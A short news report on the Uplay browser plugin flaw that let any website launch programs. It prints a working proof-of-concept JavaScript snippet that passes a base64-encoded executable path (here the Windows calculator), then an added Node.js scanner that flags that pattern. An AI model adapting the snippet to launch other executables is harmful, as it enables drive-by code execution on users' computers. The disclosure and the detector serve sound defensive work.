A serious vulnerability was revealed yesterday in Ubisoft's Uplay program: a backdoor on the computers of millions of users who have installed licensed games from Ubisoft, such as Assassin's Creed, Beowulf, Heroes of Might and Magic VI, Tom Clancy's Splinter Cell and others. Together with the game, Uplay DRM and a browser extension were installed on their computers.
By passing special code to this extension, the user's system can be accessed from any site.
Demo (as an example, it runs the Calculator program on your computer).
Code:
var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play");
Ubisoft assures that the backdoor was not deliberately built into the system and that it is just a mistake in the code. They have already released an updated version of Uplay, which can be downloaded from the official site.
But the program does not update automatically and it is installed on millions of computers, so the security risk remains for a great many users. Mozilla therefore decided today to completely block the Uplay extension for all users.
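An added example, not part of the original article or Ubisoft's code: a Node.js scanner that flags page source referencing the plugin's `application/x-uplaypc` MIME type and decodes the base64 `-orbit_exe_path` argument to show which executable a page asks the plugin to launch. The names `scanSource` and `decodeExePath` are hypothetical, and the sample input is constructed from the snippet quoted above.

```javascript
// Added example: detect page source that drives the Uplay browser plugin.
// SAMPLE is constructed from the snippet quoted in this article.
const SAMPLE = 'x.setAttribute("type", "application/x-uplaypc"); ' +
  'x.open("-orbit_product_id 1 -orbit_exe_path ' +
  'QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode")';

// MIME type the plugin registers, and the argument carrying the encoded path.
const PLUGIN_MIME = /application\/x-uplaypc/i;
const EXE_PATH_ARG = /-orbit_exe_path\s+([A-Za-z0-9+\/]+={0,2})/g;

// Decode base64 strictly: return null if the value does not round-trip,
// because Buffer.from() silently tolerates malformed input.
function decodeExePath(b64) {
  const buf = Buffer.from(b64, 'base64');
  const strip = (s) => s.replace(/=+$/, '');
  if (strip(buf.toString('base64')) !== strip(b64)) return null;
  return buf.toString('utf8');
}

// Scan HTML/JS text (a saved page, a proxy capture) and report findings.
function scanSource(source) {
  const finding = { usesPlugin: PLUGIN_MIME.test(source), exePaths: [] };
  for (const m of source.matchAll(EXE_PATH_ARG)) {
    finding.exePaths.push({ encoded: m[1], decoded: decodeExePath(m[1]) });
  }
  finding.suspicious = finding.usesPlugin || finding.exePaths.length > 0;
  return finding;
}

console.log(JSON.stringify(scanSource(SAMPLE), null, 2));
```

The scanner only matches literal strings, so source that assembles the MIME type or arguments at run time will not be flagged.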